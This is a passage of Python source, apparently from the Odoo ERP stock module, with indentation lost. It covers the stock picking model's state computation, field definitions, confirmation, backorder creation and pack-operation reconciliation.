after_vals['location_id'] = vals['location_id']
if vals.get('location_dest_id'):
after_vals['location_dest_id'] = vals['location_dest_id']
# Change locations of moves if those of the picking change
if after_vals:
moves = []
for pick in self.browse(cr, uid, ids, context=context):
moves += [x.id for x in pick.move_lines if not x.scrapped]
if moves:
self.pool['stock.move'].write(cr, uid, moves, after_vals, context=context)
return res
def _state_get(self, cr, uid, ids, field_name, arg, context=None):
'''The state of a picking depends on the state of its related stock.move
draft: the picking has no line or any one of the lines is draft
done, draft, cancel: all lines are done / draft / cancel
confirmed, waiting, assigned, partially_available depends on move_type (all at once or partial)
'''
res = {}
for pick in self.browse(cr, uid, ids, context=context):
if not pick.move_lines:
res[pick.id] = pick.launch_pack_operations and 'assigned' or 'draft'
continue
if any([x.state == 'draft' for x in pick.move_lines]):
res[pick.id] = 'draft'
continue
if all([x.state == 'cancel' for x in pick.move_lines]):
res[pick.id] = 'cancel'
continue
if all([x.state in ('cancel', 'done') for x in pick.move_lines]):
res[pick.id] = 'done'
continue
order = {'confirmed': 0, 'waiting': 1, 'assigned': 2}
order_inv = {0: 'confirmed', 1: 'waiting', 2: 'assigned'}
lst = [order[x.state] for x in pick.move_lines if x.state not in ('cancel', 'done')]
if pick.move_type == 'one':
res[pick.id] = order_inv[min(lst)]
else:
#we are in the case of partial delivery, so if all moves are assigned, the picking
#should be assigned too; else if one of the moves is assigned or partially available, the picking should be
#in the partially available state; otherwise the picking is in the waiting or confirmed state
res[pick.id] = order_inv[max(lst)]
if not all(x == 2 for x in lst):
if any(x == 2 for x in lst):
res[pick.id] = 'partially_available'
else:
#if all moves aren't assigned, check if we have one product partially available
for move in pick.move_lines:
if move.partially_available:
res[pick.id] = 'partially_available'
break
return res
def _get_pickings(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.picking_id:
res.add(move.picking_id.id)
return list(res)
def _get_pickings_dates_priority(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.picking_id and (not (move.picking_id.min_date < move.date_expected < move.picking_id.max_date) or move.priority > move.picking_id.priority):
res.add(move.picking_id.id)
return list(res)
def _get_pack_operation_exist(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pick in self.browse(cr, uid, ids, context=context):
res[pick.id] = False
if pick.pack_operation_ids:
res[pick.id] = True
return res
def _get_quant_reserved_exist(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pick in self.browse(cr, uid, ids, context=context):
res[pick.id] = False
for move in pick.move_lines:
if move.reserved_quant_ids:
res[pick.id] = True
continue
return res
def action_assign_owner(self, cr, uid, ids, context=None):
for picking in self.browse(cr, uid, ids, context=context):
packop_ids = [op.id for op in picking.pack_operation_ids]
self.pool.get('stock.pack.operation').write(cr, uid, packop_ids, {'owner_id': picking.owner_id.id}, context=context)
def onchange_picking_type(self, cr, uid, ids, picking_type_id, partner_id, context=None):
res = {}
if picking_type_id:
picking_type = self.pool['stock.picking.type'].browse(cr, uid, picking_type_id, context=context)
if not picking_type.default_location_src_id:
if partner_id:
partner = self.pool['res.partner'].browse(cr, uid, partner_id, context=context)
location_id = partner.property_stock_supplier.id
else:
customerloc, supplierloc = self.pool['stock.warehouse']._get_partner_locations(cr, uid, [], context=context)
location_id = supplierloc.id
else:
location_id = picking_type.default_location_src_id.id
if not picking_type.default_location_dest_id:
if partner_id:
partner = self.pool['res.partner'].browse(cr, uid, partner_id, context=context)
location_dest_id = partner.property_stock_customer.id
else:
customerloc, supplierloc = self.pool['stock.warehouse']._get_partner_locations(cr, uid, [], context=context)
location_dest_id = customerloc.id
else:
location_dest_id = picking_type.default_location_dest_id.id
res['value'] = {'location_id': location_id,
'location_dest_id': location_dest_id,
'picking_type_code': picking_type.code,}
return res
def _default_location_destination(self):
# retrieve picking type from context; if none this returns an empty recordset
picking_type_id = self._context.get('default_picking_type_id')
picking_type = self.env['stock.picking.type'].browse(picking_type_id)
return picking_type.default_location_dest_id
def _default_location_source(self):
# retrieve picking type from context; if none this returns an empty recordset
picking_type_id = self._context.get('default_picking_type_id')
picking_type = self.env['stock.picking.type'].browse(picking_type_id)
return picking_type.default_location_src_id
@api.model
def default_get(self, fields):
res = super(stock_picking, self).default_get(fields)
if self._context.get('default_picking_type_id') and 'picking_type_id' in fields:
picking_type = self.env['stock.picking.type'].browse(res['picking_type_id'])
res['picking_type_code'] = picking_type.code
return res
_columns = {
'name': fields.char('Reference', select=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, copy=False),
'origin': fields.char('Source Document', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="Reference of the document", select=True),
'backorder_id': fields.many2one('stock.picking', 'Back Order of', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True, copy=False),
'note': fields.text('Notes'),
'move_type': fields.selection([('direct', 'Partial'), ('one', 'All at once')], 'Delivery Method', required=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="It specifies whether goods are to be delivered partially or all at once"),
'state': fields.function(_state_get, type="selection", copy=False,
store={
'stock.picking': (lambda self, cr, uid, ids, ctx: ids, ['move_type', 'launch_pack_operations'], 20),
'stock.move': (_get_pickings, ['state', 'picking_id', 'partially_available'], 20)},
selection=[
('draft', 'Draft'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('partially_available', 'Partially Available'),
('assigned', 'Available'),
('done', 'Done'),
], string='Status', readonly=True, select=True, track_visibility='onchange',
help="""
* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Partially Available: some products are available and reserved\n
* Ready to Transfer: products reserved, simply waiting for confirmation.\n
* Transferred: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""
),
'location_id': fields.many2one('stock.location', required=True, string="Source Location Zone",
default=_default_location_source, readonly=True, states={'draft': [('readonly', False)]}),
'location_dest_id': fields.many2one('stock.location', required=True,string="Destination Location Zone",
default=_default_location_destination, readonly=True, states={'draft': [('readonly', False)]}),
'move_lines': fields.one2many('stock.move', 'picking_id', string="Stock Moves", copy=True),
'move_lines_related': fields.related('move_lines', type='one2many', relation='stock.move', string="Move Lines"),
'picking_type_id': fields.many2one('stock.picking.type', 'Picking Type', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, required=True),
'picking_type_code': fields.related('picking_type_id', 'code', type='selection', selection=[('incoming', 'Suppliers'), ('outgoing', 'Customers'), ('internal', 'Internal')]),
'picking_type_entire_packs': fields.related('picking_type_id', 'show_entire_packs', type='boolean'),
'priority': fields.function(get_min_max_date, multi="min_max_date", fnct_inv=_set_priority, type='selection', selection=procurement.PROCUREMENT_PRIORITIES, string='Priority',
store={'stock.move': (_get_pickings_dates_priority, ['priority', 'picking_id'], 20)}, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, select=1, help="Priority for this picking. Setting manually a value here would set it as priority for all the moves",
track_visibility='onchange', required=True),
'min_date': fields.function(get_min_max_date, multi="min_max_date", fnct_inv=_set_min_date,
store={'stock.move': (_get_pickings_dates_priority, ['date_expected', 'picking_id'], 20)}, type='datetime', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, string='Scheduled Date', select=1, help="Scheduled time for the first part of the shipment to be processed. Setting manually a value here would set it as expected date for all the stock moves.", track_visibility='onchange'),
'max_date': fields.function(get_min_max_date, multi="min_max_date",
store={'stock.move': (_get_pickings_dates_priority, ['date_expected', 'picking_id'], 20)}, type='datetime', string='Max. Expected Date', select=2, help="Scheduled time for the last part of the shipment to be processed"),
'date': fields.datetime('Creation Date', help="Creation Date, usually the time of the order", select=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, track_visibility='onchange'),
'date_done': fields.datetime('Date of Transfer', help="Completion Date of Transfer", readonly=True, copy=False),
'quant_reserved_exist': fields.function(_get_quant_reserved_exist, type='boolean', string='Has quants already reserved', help='Check the existence of quants linked to this picking'),
'partner_id': fields.many2one('res.partner', 'Partner', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
'pack_operation_ids': fields.one2many('stock.pack.operation', 'picking_id', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, string='Related Packing Operations'),
'pack_operation_product_ids': fields.one2many('stock.pack.operation', 'picking_id', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, domain=[('product_id', '!=', False)], string='Non pack'),
'pack_operation_pack_ids': fields.one2many('stock.pack.operation', 'picking_id', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, domain=[('product_id', '=', False)], string='Pack'),
# technical field for attrs in view
'pack_operation_exist': fields.function(_get_pack_operation_exist, type='boolean', string='Has Pack Operations', help='Check the existence of pack operations on the picking'),
'owner_id': fields.many2one('res.partner', 'Owner', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="Default Owner"),
'printed': fields.boolean('Printed'),
# Used to search on pickings
'product_id': fields.related('move_lines', 'product_id', type='many2one', relation='product.product', string='Product'),
'recompute_pack_op': fields.boolean('Recompute pack operation?', help='True if reserved quants changed, which means we might need to recompute the package operations', copy=False),
'group_id': fields.related('move_lines', 'group_id', type='many2one', relation='procurement.group', string='Procurement Group', readonly=True,
store={
'stock.picking': (lambda self, cr, uid, ids, ctx: ids, ['move_lines'], 10),
'stock.move': (_get_pickings, ['group_id', 'picking_id'], 10),
}),
'launch_pack_operations': fields.boolean("Launch Pack Operations", copy=False),
}
_defaults = {
'name': '/',
'state': 'draft',
'move_type': 'direct',
'printed': False,
'priority': '1', # normal
'date': fields.datetime.now,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.picking', context=c),
'recompute_pack_op': False,
'launch_pack_operations': False,
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Reference must be unique per company!'),
]
def do_print_picking(self, cr, uid, ids, context=None):
'''This function prints the picking list'''
context = dict(context or {}, active_ids=ids)
self.write(cr, uid, ids, {'printed': True}, context=context)
return self.pool.get("report").get_action(cr, uid, ids, 'stock.report_picking', context=context)
def launch_packops(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'launch_pack_operations': True}, context=context)
def action_confirm(self, cr, uid, ids, context=None):
todo = []
todo_force_assign = []
for picking in self.browse(cr, uid, ids, context=context):
if not picking.move_lines:
self.launch_packops(cr, uid, [picking.id], context=context)
if picking.location_id.usage in ('supplier', 'inventory', 'production'):
todo_force_assign.append(picking.id)
for r in picking.move_lines:
if r.state == 'draft':
todo.append(r.id)
if len(todo):
self.pool.get('stock.move').action_confirm(cr, uid, todo, context=context)
if todo_force_assign:
self.force_assign(cr, uid, todo_force_assign, context=context)
return True
def action_assign(self, cr, uid, ids, context=None):
""" Check availability of picking moves.
This has the effect of changing the state and reserving quants on available moves, and may
also impact the state of the picking as it is computed based on the moves' states.
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
if pick.state == 'draft':
self.action_confirm(cr, uid, [pick.id], context=context)
#skip the moves that don't need to be checked
move_ids = [x.id for x in pick.move_lines if x.state not in ('draft', 'cancel', 'done')]
if not move_ids:
raise UserError(_('Nothing to check the availability for.'))
self.pool.get('stock.move').action_assign(cr, uid, move_ids, context=context)
return True
def force_assign(self, cr, uid, ids, context=None):
""" Changes state of picking to available if moves are confirmed or waiting.
@return: True
"""
pickings = self.browse(cr, uid, ids, context=context)
for pick in pickings:
move_ids = [x.id for x in pick.move_lines if x.state in ['confirmed', 'waiting']]
self.pool.get('stock.move').force_assign(cr, uid, move_ids, context=context)
return True
def action_cancel(self, cr, uid, ids, context=None):
for pick in self.browse(cr, uid, ids, context=context):
ids2 = [move.id for move in pick.move_lines]
self.pool.get('stock.move').action_cancel(cr, uid, ids2, context)
return True
def action_done(self, cr, uid, ids, context=None):
"""Changes picking state to done by processing the Stock Moves of the Picking
Normally that happens when the button "Done" is pressed on a Picking view.
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
todo = []
for move in pick.move_lines:
if move.state == 'draft':
todo.extend(self.pool.get('stock.move').action_confirm(cr, uid, [move.id], context=context))
elif move.state in ('assigned', 'confirmed'):
todo.append(move.id)
if len(todo):
self.pool.get('stock.move').action_done(cr, uid, todo, context=context)
return True
def unlink(self, cr, uid, ids, context=None):
#on picking deletion, cancel its move then unlink them too
move_obj = self.pool.get('stock.move')
context = context or {}
for pick in self.browse(cr, uid, ids, context=context):
move_ids = [move.id for move in pick.move_lines]
move_obj.action_cancel(cr, uid, move_ids, context=context)
move_obj.unlink(cr, uid, move_ids, context=context)
return super(stock_picking, self).unlink(cr, uid, ids, context=context)
def _create_backorder(self, cr, uid, picking, backorder_moves=[], context=None):
""" Move all non-done lines into a new backorder picking. If the key 'do_only_split' is given in the context, then move all lines not in context.get('split', []) instead of all non-done lines.
"""
if not backorder_moves:
backorder_moves = picking.move_lines
backorder_move_ids = [x.id for x in backorder_moves if x.state not in ('done', 'cancel')]
if 'do_only_split' in context and context['do_only_split']:
backorder_move_ids = [x.id for x in backorder_moves if x.id not in context.get('split', [])]
if backorder_move_ids:
backorder_id = self.copy(cr, uid, picking.id, {
'name': '/',
'move_lines': [],
'pack_operation_ids': [],
'backorder_id': picking.id,
})
backorder = self.browse(cr, uid, backorder_id, context=context)
self.message_post(cr, uid, picking.id, body=_("Back order <em>%s</em> <b>created</b>.") % (backorder.name), context=context)
move_obj = self.pool.get("stock.move")
move_obj.write(cr, uid, backorder_move_ids, {'picking_id': backorder_id}, context=context)
if not picking.date_done:
self.write(cr, uid, [picking.id], {'date_done': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
self.action_confirm(cr, uid, [backorder_id], context=context)
self.action_assign(cr, uid, [backorder_id], context=context)
return backorder_id
return False
@api.cr_uid_ids_context
def recheck_availability(self, cr, uid, picking_ids, context=None):
self.action_assign(cr, uid, picking_ids, context=context)
self.do_prepare_partial(cr, uid, picking_ids, context=context)
def _get_top_level_packages(self, cr, uid, quants_suggested_locations, context=None):
"""This method searches for the higher level packages that can be moved as a single operation, given a list of quants
to move and their suggested destination, and returns the list of matching packages.
"""
# Try to find as many top-level packages as possible that can be moved
pack_obj = self.pool.get("stock.quant.package")
quant_obj = self.pool.get("stock.quant")
top_lvl_packages = set()
quants_to_compare = quants_suggested_locations.keys()
for pack in list(set([x.package_id for x in quants_suggested_locations.keys() if x and x.package_id])):
loop = True
test_pack = pack
good_pack = False
pack_destination = False
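# Climb up the package hierarchy: a candidate package qualifies only if every quant it contains is part of this picking's quants and shares the same suggested destination.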
while loop:
pack_quants = pack_obj.get_content(cr, uid, [test_pack.id], context=context)
all_in = True
for quant in quant_obj.browse(cr, uid, pack_quants, context=context):
# If the quant is not in the quants to compare and not in the common location
if not quant in quants_to_compare:
all_in = False
break
else:
#if a putaway strategy applies, the destination location of each quant may be different (and thus the package should not be taken as a single operation)
if not pack_destination:
pack_destination = quants_suggested_locations[quant]
elif pack_destination != quants_suggested_locations[quant]:
all_in = False
break
if all_in:
good_pack = test_pack
if test_pack.parent_id:
test_pack = test_pack.parent_id
else:
#stop the loop when there's no parent package anymore
loop = False
else:
#stop the loop when the package test_pack is not totally reserved for moves of this picking
#(some quants may be reserved for other pickings or not reserved at all)
loop = False
if good_pack:
top_lvl_packages.add(good_pack)
return list(top_lvl_packages)
def _prepare_pack_ops(self, cr, uid, picking, quants, forced_qties, context=None):
""" returns a list of dict, ready to be used in create() of stock.pack.operation.
:param picking: browse record (stock.picking)
:param quants: browse record list (stock.quant). List of quants associated to the picking
:param forced_qties: dictionary showing for each product (keys) its corresponding quantity (value) that is not covered by the quants associated to the picking
"""
def _picking_putaway_apply(product):
location = False
# Search putaway strategy
if product_putaway_strats.get(product.id):
location = product_putaway_strats[product.id]
else:
location = self.pool.get('stock.location').get_putaway_strategy(cr, uid, picking.location_dest_id, product, context=context)
product_putaway_strats[product.id] = location
return location or picking.location_dest_id.id
# If we encounter a UoM that is smaller than the default UoM or the one already chosen, use the new one instead.
product_uom = {} # Determines UoM used in pack operations
location_dest_id = None
location_id = None
for move in [x for x in picking.move_lines if x.state not in ('done', 'cancel')]:
if not product_uom.get(move.product_id.id):
product_uom[move.product_id.id] = move.product_id.uom_id
if move.product_uom.id != move.product_id.uom_id.id and move.product_uom.factor > product_uom[move.product_id.id].factor:
product_uom[move.product_id.id] = move.product_uom
if not move.scrapped:
if location_dest_id and move.location_dest_id.id != location_dest_id:
raise UserError(_('The destination location must be the same for all the moves of the picking.'))
location_dest_id = move.location_dest_id.id
if location_id and move.location_id.id != location_id:
raise UserError(_('The source location must be the same for all the moves of the picking.'))
location_id = move.location_id.id
pack_obj = self.pool.get("stock.quant.package")
quant_obj = self.pool.get("stock.quant")
vals = []
qtys_grouped = {}
lots_grouped = {}
#for each quant of the picking, find the suggested location
quants_suggested_locations = {}
product_putaway_strats = {}
for quant in quants:
if quant.qty <= 0:
continue
suggested_location_id = _picking_putaway_apply(quant.product_id)
quants_suggested_locations[quant] = suggested_location_id
#find the packages we can move as a whole
top_lvl_packages = self._get_top_level_packages(cr, uid, quants_suggested_locations, context=context)
# and then create pack operations for the top-level packages found
for pack in top_lvl_packages:
pack_quant_ids = pack_obj.get_content(cr, uid, [pack.id], context=context)
pack_quants = quant_obj.browse(cr, uid, pack_quant_ids, context=context)
vals.append({
'picking_id': picking.id,
'package_id': pack.id,
'product_qty': 1.0,
'location_id': pack.location_id.id,
'location_dest_id': quants_suggested_locations[pack_quants[0]],
'owner_id': pack.owner_id.id,
})
#remove the quants inside the package so that they are excluded from the rest of the computation
for quant in pack_quants:
del quants_suggested_locations[quant]
# Go through all remaining reserved quants and group by product, package, owner, source location and dest location
# Lots will go into pack operation lot object
for quant, dest_location_id in quants_suggested_locations.items():
key = (quant.product_id.id, quant.package_id.id, quant.owner_id.id, quant.location_id.id, dest_location_id)
if qtys_grouped.get(key):
qtys_grouped[key] += quant.qty
else:
qtys_grouped[key] = quant.qty
if quant.product_id.tracking != 'none' and quant.lot_id:
lots_grouped.setdefault(key, {}).setdefault(quant.lot_id.id, 0.0)
lots_grouped[key][quant.lot_id.id] += quant.qty
# Do the same for the forced quantities (in cases of force_assign or incoming shipments for example)
for product, qty in forced_qties.items():
if qty <= 0:
continue
suggested_location_id = _picking_putaway_apply(product)
key = (product.id, False, picking.owner_id.id, picking.location_id.id, suggested_location_id)
if qtys_grouped.get(key):
qtys_grouped[key] += qty
else:
qtys_grouped[key] = qty
# Create the necessary operations for the grouped quants and remaining qtys
uom_obj = self.pool.get('product.uom')
prevals = {}
for key, qty in qtys_grouped.items():
product = self.pool.get("product.product").browse(cr, uid, key[0], context=context)
uom_id = product.uom_id.id
qty_uom = qty
if product_uom.get(key[0]):
uom_id = product_uom[key[0]].id
qty_uom = uom_obj._compute_qty(cr, uid, product.uom_id.id, qty, uom_id)
pack_lot_ids = []
if lots_grouped.get(key):
for lot in lots_grouped[key].keys():
pack_lot_ids += [(0, 0, {'lot_id': lot, 'qty': 0.0, 'qty_todo': lots_grouped[key][lot]})]
val_dict = {
'picking_id': picking.id,
'product_qty': qty_uom,
'product_id': key[0],
'package_id': key[1],
'owner_id': key[2],
'location_id': key[3],
'location_dest_id': key[4],
'product_uom_id': uom_id,
'pack_lot_ids': pack_lot_ids,
}
if key[0] in prevals:
prevals[key[0]].append(val_dict)
else:
prevals[key[0]] = [val_dict]
# prevals holds the operations so that they can be created in the same order as the picking's stock moves if possible
processed_products = set()
for move in [x for x in picking.move_lines if x.state not in ('done', 'cancel')]:
if move.product_id.id not in processed_products:
vals += prevals.get(move.product_id.id, [])
processed_products.add(move.product_id.id)
return vals
@api.cr_uid_ids_context
def do_prepare_partial(self, cr, uid, picking_ids, context=None):
context = context or {}
pack_operation_obj = self.pool.get('stock.pack.operation')
#get list of existing operations and delete them
existing_package_ids = pack_operation_obj.search(cr, uid, [('picking_id', 'in', picking_ids)], context=context)
if existing_package_ids:
pack_operation_obj.unlink(cr, uid, existing_package_ids, context)
for picking in self.browse(cr, uid, picking_ids, context=context):
forced_qties = {} # Quantity remaining after calculating reserved quants
picking_quants = []
#Calculate packages, reserved quants, qtys of this picking's moves
for move in picking.move_lines:
if move.state not in ('assigned', 'confirmed', 'waiting'):
continue
move_quants = move.reserved_quant_ids
picking_quants += move_quants
forced_qty = (move.state == 'assigned') and move.product_qty - sum([x.qty for x in move_quants]) or 0
#if we used force_assign() on the move, or if the move is incoming, forced_qty > 0
if float_compare(forced_qty, 0, precision_rounding=move.product_id.uom_id.rounding) > 0:
if forced_qties.get(move.product_id):
forced_qties[move.product_id] += forced_qty
else:
forced_qties[move.product_id] = forced_qty
for vals in self._prepare_pack_ops(cr, uid, picking, picking_quants, forced_qties, context=context):
vals['fresh_record'] = False
pack_operation_obj.create(cr, uid, vals, context=context)
#recompute the remaining quantities all at once
self.do_recompute_remaining_quantities(cr, uid, picking_ids, context=context)
self.write(cr, uid, picking_ids, {'recompute_pack_op': False}, context=context)
@api.cr_uid_ids_context
def do_unreserve(self, cr, uid, picking_ids, context=None):
"""
Will unreserve all the quants (and remove the pack operations) of the pickings in picking_ids
"""
moves_to_unreserve = []
pack_line_to_unreserve = []
for picking in self.browse(cr, uid, picking_ids, context=context):
moves_to_unreserve += [m.id for m in picking.move_lines if m.state not in ('done', 'cancel')]
pack_line_to_unreserve += [p.id for p in picking.pack_operation_ids]
if moves_to_unreserve:
if pack_line_to_unreserve:
self.pool.get('stock.pack.operation').unlink(cr, uid, pack_line_to_unreserve, context=context)
self.pool.get('stock.move').do_unreserve(cr, uid, moves_to_unreserve, context=context)
def recompute_remaining_qty(self, cr, uid, picking, done_qtys=False, context=None):
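# Reconciles pack operations with stock moves by (re)creating stock.move.operation.link records; returns a (need_rereserve, all_op_processed) tuple.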
def _create_link_for_index(operation_id, index, product_id, qty_to_assign, quant_id=False):
move_dict = prod2move_ids[product_id][index]
qty_on_link = min(move_dict['remaining_qty'], qty_to_assign)
self.pool.get('stock.move.operation.link').create(cr, uid, {'move_id': move_dict['move'].id, 'operation_id': operation_id, 'qty': qty_on_link, 'reserved_quant_id': quant_id}, context=context)
if move_dict['remaining_qty'] == qty_on_link:
prod2move_ids[product_id].pop(index)
else:
move_dict['remaining_qty'] -= qty_on_link
return qty_on_link
def _create_link_for_quant(operation_id, quant, qty):
"""create a link for given operation and reserved move of given quant, for the max quantity possible, and returns this quantity"""
if not quant.reservation_id.id:
return _create_link_for_product(operation_id, quant.product_id.id, qty)
qty_on_link = 0
for i in range(0, len(prod2move_ids[quant.product_id.id])):
if prod2move_ids[quant.product_id.id][i]['move'].id != quant.reservation_id.id:
continue
qty_on_link = _create_link_for_index(operation_id, i, quant.product_id.id, qty, quant_id=quant.id)
break
return qty_on_link
def _create_link_for_product(operation_id, product_id, qty):
'''method that creates the link between a given operation and move(s) of given product, for the given quantity.
Returns True if it was possible to create links for the requested quantity (False if there was not enough quantity on stock moves)'''
qty_to_assign = qty
prod_obj = self.pool.get("product.product")
product = prod_obj.browse(cr, uid, product_id)
rounding = product.uom_id.rounding
qtyassign_cmp = float_compare(qty_to_assign, 0.0, precision_rounding=rounding)
if prod2move_ids.get(product_id):
while prod2move_ids[product_id] and qtyassign_cmp > 0:
qty_on_link = _create_link_for_index(operation_id, 0, product_id, qty_to_assign, quant_id=False)
qty_to_assign -= qty_on_link
qtyassign_cmp = float_compare(qty_to_assign, 0.0, precision_rounding=rounding)
return qtyassign_cmp == 0
uom_obj = self.pool.get('product.uom')
package_obj = self.pool.get('stock.quant.package')
quant_obj = self.pool.get('stock.quant')
link_obj = self.pool.get('stock.move.operation.link')
quants_in_package_done = set()
prod2move_ids = {}
still_to_do = []
#make a dictionary giving for each product, the moves and related quantity that can be used in operation links
moves = sorted([x for x in picking.move_lines if x.state not in ('done', 'cancel')], key=lambda x: (((x.state == 'assigned') and -2 or 0) + (x.partially_available and -1 or 0)))
for move in moves:
if not prod2move_ids.get(move.product_id.id):
prod2move_ids[move.product_id.id] = [{'move': move, 'remaining_qty': move.product_qty}]
else:
prod2move_ids[move.product_id.id].append({'move': move, 'remaining_qty': move.product_qty})
need_rereserve = False
#sort the operations in order to give higher priority to those with a package, then a serial number
operations = picking.pack_operation_ids
operations = sorted(operations, key=lambda x: ((x.package_id and not x.product_id) and -4 or 0) + (x.package_id and -2 or 0) + (x.pack_lot_ids and -1 or 0))
#delete existing operations to start again from scratch
links = link_obj.search(cr, uid, [('operation_id', 'in', [x.id for x in operations])], context=context)
if links:
link_obj.unlink(cr, uid, links, context=context)
#1) first, try to create links when quants can be identified without any doubt
for ops in operations:
lot_qty = {}
for packlot in ops.pack_lot_ids:
lot_qty[packlot.lot_id.id] = uom_obj._compute_qty(cr, uid, ops.product_uom_id.id, packlot.qty, ops.product_id.uom_id.id)
#for each operation, create the links with the stock move by looking at the matching reserved quants,
#and defer the operation if there is some ambiguity about the move to select
if ops.package_id and not ops.product_id and (not done_qtys or ops.qty_done):
#entire package
quant_ids = package_obj.get_content(cr, uid, [ops.package_id.id], context=context)
for quant in quant_obj.browse(cr, uid, quant_ids, context=context):
remaining_qty_on_quant = quant.qty
if quant.reservation_id:
#avoid quants being counted twice
quants_in_package_done.add(quant.id)
qty_on_link = _create_link_for_quant(ops.id, quant, quant.qty)
remaining_qty_on_quant -= qty_on_link
if remaining_qty_on_quant:
still_to_do.append((ops, quant.product_id.id, remaining_qty_on_quant))
need_rereserve = True
elif ops.product_id.id:
#Check moves with same product
product_qty = ops.qty_done if done_qtys else ops.product_qty
qty_to_assign = uom_obj._compute_qty_obj(cr, uid, ops.product_uom_id, product_qty, ops.product_id.uom_id, context=context)
precision_rounding = ops.product_id.uom_id.rounding
for move_dict in prod2move_ids.get(ops.product_id.id, []):
move = move_dict['move']
for quant in move.reserved_quant_ids:
if float_compare(qty_to_assign, 0, precision_rounding=precision_rounding) != 1:
break
if quant.id in quants_in_package_done:
continue
#check if the quant is matching the operation details
if ops.package_id:
flag = quant.package_id == ops.package_id
else:
flag = not quant.package_id.id
flag = flag and (ops.owner_id.id == quant.owner_id.id)
if flag:
if not lot_qty:
max_qty_on_link = min(quant.qty, qty_to_assign)
qty_on_link = _create_link_for_quant(ops.id, quant, max_qty_on_link)
qty_to_assign -= qty_on_link
else:
if lot_qty.get(quant.lot_id.id): #if there is still some qty left
max_qty_on_link = min(quant.qty, qty_to_assign, lot_qty[quant.lot_id.id])
qty_on_link = _create_link_for_quant(ops.id, quant, max_qty_on_link)
qty_to_assign -= qty_on_link
lot_qty[quant.lot_id.id] -= qty_on_link
qty_assign_cmp = float_compare(qty_to_assign, 0, precision_rounding=precision_rounding)
if qty_assign_cmp > 0:
#qty reserved is less than qty put in operations. We need to create a link, but it's deferred until after we have processed
#all the quants (because they leave no choice on their related move and need to be processed with higher priority)
still_to_do += [(ops, ops.product_id.id, qty_to_assign)]
need_rereserve = True
#2) then, process the remaining part
all_op_processed = True
for ops, product_id, remaining_qty in still_to_do:
all_op_processed = _create_link_for_product(ops.id, product_id, remaining_qty) and all_op_processed
return (need_rereserve, all_op_processed)
def picking_recompute_remaining_quantities(self, cr, uid, picking, done_qtys=False, context=None):
need_rereserve = False
all_op_processed = True
if picking.pack_operation_ids:
need_rereserve, all_op_processed = self.recompute_remaining_qty(cr, uid, picking, done_qtys=done_qtys, context=context)
return need_rereserve, all_op_processed
@api.cr_uid_ids_context
def do_recompute_remaining_quantities(self, cr, uid, picking_ids, done_qtys=False, context=None):
for picking in self.browse(cr, uid, picking_ids, context=context):
if picking.pack_operation_ids:
self.recompute_remaining_qty(cr, uid, picking, done_qtys=done_qtys, context=context)
def _prepare_values_extra_move(self, cr, uid, op, product, remaining_qty, context=None):
"""
Creates an extra move when there is no corresponding original move to be copied
"""
uom_obj = self.pool.get("product.uom")
uom_id = product.uom_id.id
qty = remaining_qty
if op.product_id and op.product_uom_id and op.product_uom_id.id != product.uom_id.id:
if op.product_uom_id.factor > product.uom_id.factor: #If the pack operation's UoM is a smaller unit
uom_id = op.product_uom_id.id
#HALF-UP rounding, as any rounding errors here only come from error propagated from the default UoM
qty = uom_obj._compute_qty_obj(cr, uid, product.uom_id, remaining_qty, op.product_uom_id, rounding_method='HALF-UP')
picking = op.picking_id
ref = product.default_code
name = '[' + ref + ']' + ' ' + product.name if ref else product.name
proc_id = False
for m in op.linked_move_operation_ids:
if m.move_id.procurement_id:
proc_id = m.move_id.procurement_id.id
break
res = {
'picking_id': picking.id,
'location_id': picking.location_id.id,
'location_dest_id': picking.location_dest_id.id,
'product_id': product.id,
'procurement_id': proc_id,
'product_uom': uom_id,
'product_uom_qty': qty,
'name': _('Extra Move: ') + name,
'state': 'draft',
'restrict_partner_id': op.owner_id.id,
'group_id': picking.group_id.id,
}
return res
def _create_extra_moves(self, cr, uid, picking, context=None):
'''This function creates move lines on a picking, at the time of do_transfer, based on
unexpected product transfers (or exceeding quantities) found in the pack operations.
'''
move_obj = self.pool.get('stock.move')
operation_obj = self.pool.get('stock.pack.operation')
moves = []
for op in picking.pack_operation_ids:
for product, remaining_qty in operation_obj._get_remaining_prod_quantities(cr, uid, op, context=context).items():
if float_compare(remaining_qty, 0, precision_rounding=product.uom_id.rounding) > 0:
vals = self._prepare_values_extra_move(cr, uid, op, product, remaining_qty, context=context)
moves.append(move_obj.create(cr, uid, vals, context=context))
if moves:
move_obj.action_confirm(cr, uid, moves, context=context)
return moves
def rereserve_pick(self, cr, uid, ids, context=None):
"""
This can be used to provide a button that rereserves taking into account the existing pack operations
"""
